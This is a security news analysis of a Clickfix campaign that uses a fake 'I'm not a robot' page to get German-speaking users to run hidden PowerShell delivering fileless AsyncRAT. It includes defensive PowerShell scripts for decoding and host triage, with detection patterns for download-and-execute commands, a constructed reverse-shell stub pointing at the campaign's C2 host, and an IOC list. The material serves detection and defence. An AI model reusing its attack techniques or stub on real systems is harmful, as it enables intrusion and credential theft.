Fileless AsyncRAT Delivered by Hackers Through Fake Verification Prompt Using Clickfix Technique

Threat actors are distributing fileless AsyncRAT malware using a fake verification prompt delivered via the so-called “Clickfix” technique.

The campaign, which leverages advanced PowerShell obfuscation and in-memory C# loaders, has been actively targeting German-speaking users, exploiting social engineering and living-off-the-land binaries (LOLBins) to maximize stealth and persistence.

Technical Analysis

Researchers discovered a malicious Clickfix-themed website that lures victims with a seemingly harmless “I’m not a robot” prompt.

[Figure: Clickfix-themed delivery website]

When a visitor clicks the prompt, the page silently copies a PowerShell command to the clipboard and instructs the victim in German ("Drücke enter um deine identität zu bestätigen!", i.e. "Press Enter to confirm your identity!") to paste and run it in a terminal.

The command hides behind the legitimate conhost.exe utility in its headless mode (conhost.exe --headless), which runs a console program with no visible window, and from there launches PowerShell with flags that keep it out of sight (-w hidden for a hidden window, -nop to skip the profile, -c for an inline command). That PowerShell one-liner fetches a payload from a remote server (namoet[.]de), decodes it as UTF-8 text and executes it.

Once decoded and executed, the payload establishes multiple layers of persistence through two HKCU registry locations: HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce and HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows.

[Figure: Downloaded payload "x"]

Both locations are processed when the user logs on (HKCU keys are per-user, so the trigger is logon rather than system boot), so the loader is re-launched without a conventional executable ever being written to disk, which helps it evade file-based endpoint protection.

The core of the attack is deeply obfuscated PowerShell carrying embedded C# source that has been base64-encoded and then reversed; at runtime the script undoes both steps and compiles the source in memory with PowerShell's Add-Type cmdlet.

According to the CloudSEK report, the C# recovered after reversing and decoding is a .NET-based reverse shell.
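The decoding step the analysis describes, written out as an added example (this is not the CloudSEK report's code and not the campaign's loader): it peels the "base64-encode, then reverse" layer without executing anything and pulls the TcpClient target out of the recovered C#. The function names, the regexes and the C# stub used as input are this example's own; the stub is constructed to have the shape the article describes, with the host and port taken from the article.

```powershell
# Added example (not the CloudSEK report's code and not the campaign's loader):
# peel the "base64-encode, then reverse" layer the article describes without
# executing anything, and pull C2 indicators from the recovered C# source.
# Function names are this example's own; the C# stub below is constructed.

function ConvertFrom-ReversedBase64 {
    param([Parameter(Mandatory)][string]$Blob)
    # The loader reverses the base64 text, so undo the reversal before decoding.
    $chars = $Blob.ToCharArray()
    [array]::Reverse($chars)
    $bytes = [Convert]::FromBase64String((-join $chars))
    [System.Text.Encoding]::UTF8.GetString($bytes)
}

function Get-EmbeddedCSharp {
    # Find the obfuscated blob inside a PowerShell loader that feeds Add-Type.
    # Assumption (this example's, not the report's): the blob is a quoted
    # string literal made only of base64 characters, at least 64 long.
    param([Parameter(Mandatory)][string]$Loader)
    $m = [regex]::Match($Loader, '[''"]([A-Za-z0-9+/=]{64,})[''"]')
    if (-not $m.Success) { throw 'No base64-looking string literal found in loader' }
    ConvertFrom-ReversedBase64 -Blob $m.Groups[1].Value
}

function Get-ReverseShellIndicators {
    param([Parameter(Mandatory)][string]$CSharp)
    # Static triage of the recovered source: TcpClient target and whether it
    # touches System.Diagnostics.Process. Nothing here compiles or runs the C#.
    $out = [ordered]@{ Host = $null; Port = $null; SpawnsProcess = $false }
    $tcp = [regex]::Match($CSharp, 'new\s+TcpClient\s*\(\s*"([^"]+)"\s*,\s*(\d+)\s*\)')
    if ($tcp.Success) {
        $out['Host'] = $tcp.Groups[1].Value
        $out['Port'] = [int]$tcp.Groups[2].Value
    }
    $out['SpawnsProcess'] = [bool]($CSharp -match '\bProcess(StartInfo)?\b')
    [pscustomobject]$out
}

# --- Constructed sample: a minimal C# stub shaped like the stage the article
# describes, then base64-encoded and reversed the way the loader expects. ---
$sampleCSharp = @'
using System.Net.Sockets;
using System.Diagnostics;
public class Stub {
    public static void Run() {
        var client = new TcpClient("namoet.de", 4444); // C2 host/port from the article
        var shell = new Process();
    }
}
'@
$b64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($sampleCSharp))
$rev = $b64.ToCharArray(); [array]::Reverse($rev)
$reversedBlob = -join $rev

# A loader line in the shape the article describes (constructed, not the real one).
$loader = "Add-Type -TypeDefinition (Unscramble '$reversedBlob')"

$recovered = Get-EmbeddedCSharp -Loader $loader
Get-ReverseShellIndicators -CSharp $recovered
```

Run it against a captured loader by replacing $loader with the script text; the point of keeping Add-Type out of the analysis path is that the recovered source is only ever treated as data, never compiled. Real samples may stack more than one encoding layer, in which case ConvertFrom-ReversedBase64 is applied again to the output until the result stops looking like base64.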

Using TcpClient, it connects to the command-and-control server on TCP port 4444, giving the attackers full remote access, including command execution, keylogging, credential theft and data exfiltration.

All communication and process management happen in memory, which is textbook fileless malware behaviour.
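A live-host triage script for the three behaviours described above (registry persistence in the two HKCU locations, hidden PowerShell launched under conhost.exe, and an established connection to the reverse-shell port), as an added example that is not part of the CloudSEK report. The key paths and port 4444 come from the article; the regex heuristics, function names and output layout are this example's own and will need tuning for your environment.

```powershell
# Added example, not from the CloudSEK report: triage a live Windows host for
# the persistence, process lineage and network behaviour the analysis describes.
# Key paths and port 4444 come from the article; regexes are this example's own.

$SuspiciousPatterns = @(
    'conhost(\.exe)?\s+--headless',                 # LOLBin wrapper used by the campaign
    '-w(indowstyle)?\s+hidden',                     # hidden PowerShell window
    '(^|\s)-no?p(rofile)?\b',                       # -nop / -noprofile
    'downloadstring|invoke-webrequest|net\.webclient|\biwr\b|\birm\b',
    'frombase64string|add-type|invoke-expression|\biex\b'
)

function Test-SuspiciousCommand {
    param([string]$CommandLine)
    # Returns the list of patterns that matched; an empty list means nothing flagged.
    $hits = [System.Collections.Generic.List[string]]::new()
    foreach ($p in $SuspiciousPatterns) {
        if ($CommandLine -match $p) { $hits.Add($p) }
    }
    return ,$hits
}

function Get-RegistryPersistence {
    # The two HKCU locations the article names, plus the ordinary Run key.
    $keys = @(
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows'
    )
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        $item = Get-Item $k
        foreach ($name in $item.GetValueNames()) {
            $data = [string]$item.GetValue($name)
            $hits = Test-SuspiciousCommand $data
            if ($hits.Count -eq 0) { continue }
            [pscustomobject]@{
                Source   = 'Registry'
                Location = "$k\$name"
                Detail   = $data
                Matched  = ($hits -join '; ')
            }
        }
    }
}

function Get-SuspiciousProcesses {
    # Win32_Process carries CommandLine and ParentProcessId, which is enough to
    # spot conhost.exe --headless and the hidden PowerShell it launches.
    $procs = @(Get-CimInstance Win32_Process)
    $byId = @{}
    foreach ($p in $procs) { $byId[[int]$p.ProcessId] = $p }
    foreach ($p in $procs) {
        if ($p.Name -notmatch '^(conhost|powershell|pwsh)\.exe$') { continue }
        $hits = Test-SuspiciousCommand $p.CommandLine
        if ($hits.Count -eq 0) { continue }
        $parent = $byId[[int]$p.ParentProcessId]
        [pscustomobject]@{
            Source   = 'Process'
            Location = "PID $($p.ProcessId) <- $($parent.Name) PID $($p.ParentProcessId)"
            Detail   = $p.CommandLine
            Matched  = ($hits -join '; ')
        }
    }
}

function Get-SuspiciousConnections {
    param([int[]]$WatchPorts = @(4444))   # reverse-shell listener port from the article
    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
        Where-Object { $WatchPorts -contains $_.RemotePort } |
        ForEach-Object {
            $owner = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Source   = 'Network'
                Location = "$($_.LocalAddress):$($_.LocalPort) -> $($_.RemoteAddress):$($_.RemotePort)"
                Detail   = "owning process: $($owner.ProcessName) PID $($_.OwningProcess)"
                Matched  = 'remote port on watch list'
            }
        }
}

@(Get-RegistryPersistence) + @(Get-SuspiciousProcesses) + @(Get-SuspiciousConnections) |
    Format-Table -AutoSize -Wrap
```

Run it in the context of the user being investigated, since the persistence lives under HKCU. Treat a hit on the Windows NT\CurrentVersion\Windows key as high-signal: legitimate software rarely writes command lines there, whereas the Run and RunOnce keys and the -nop pattern will need allow-listing in most fleets.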

Attribution and Threat Techniques

The technical indicators of this campaign point decisively to AsyncRAT, an established open-source Remote Access Trojan.

The combination of obfuscated PowerShell, conhost.exe for stealthy execution, registry Run-key persistence, in-memory C# compilation and a persistent TCP connection to a C2 server closely mirrors AsyncRAT's known tradecraft.

MITRE ATT&CK technique mapping for this campaign includes:

  • T1059.001: Command and Scripting Interpreter: PowerShell
  • T1105: Ingress Tool Transfer (remote payload download)
  • T1027/T1027.002/T1140: Obfuscated Files or Information and Deobfuscate/Decode Files or Information (reversed, base64-encoded in-memory payloads)
  • T1027.004: Compile After Delivery (in-memory .NET compilation via Add-Type)
  • T1547.001: Registry Run Keys / Startup Folder (persistence)
  • T1071.001/T1571: Application Layer Protocol: Web Protocols (HTTP payload fetch) and Non-Standard Port (TCP/4444 reverse shell)

The infrastructure analysis reveals multiple servers tied to the same campaign and suggests activity dating back to at least April 2025.

AsyncRAT's fileless, memory-resident approach lets attackers bypass conventional file-based antivirus and keep long-term, covert control of compromised systems. The resulting risks include data exfiltration, credential theft and lateral movement across the network.

Indicators of Compromise (IOC)

Indicator Type  | Value                                                           | Use
----------------|-----------------------------------------------------------------|---------------------------------------
IP              | 109.250.111[.]155                                               | Clickfix delivery
IP              | 109.250.109[.]80                                                | Clickfix delivery
IP              | 109.250.108[.]183                                               | Clickfix delivery
IP              | 109.250.109[.]205                                               | Clickfix delivery
IP              | 109.250.110[.]222                                               | Clickfix delivery
IP              | 109.250.110[.]98                                                | Clickfix delivery
IP              | 109.250.110[.]142                                               | Clickfix delivery
IP              | 109.250.111[.]219                                               | Clickfix delivery
IP              | 109.250.111[.]186                                               | Clickfix delivery
IP              | 109.250.110[.]140                                               | Clickfix delivery
IP              | 109.250.110[.]190                                               | Clickfix delivery
IP              | 109.250.111[.]176                                               | Clickfix delivery
IP              | 109.250.110[.]228                                               | Clickfix delivery
IP              | 109.250.111[.]75                                                | Clickfix delivery
FQDN            | namoet[.]de                                                     | Command & control server
Port            | 4444                                                            | Reverse shell TCP listener
URL             | hxxp[:]//namoet[.]de:80/x                                       | PowerShell payload
Registry (HKCU) | SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windows       | Persistence (value under RunOnce key)
Registry (HKCU) | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\win        | Persistence (obfuscated command)


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
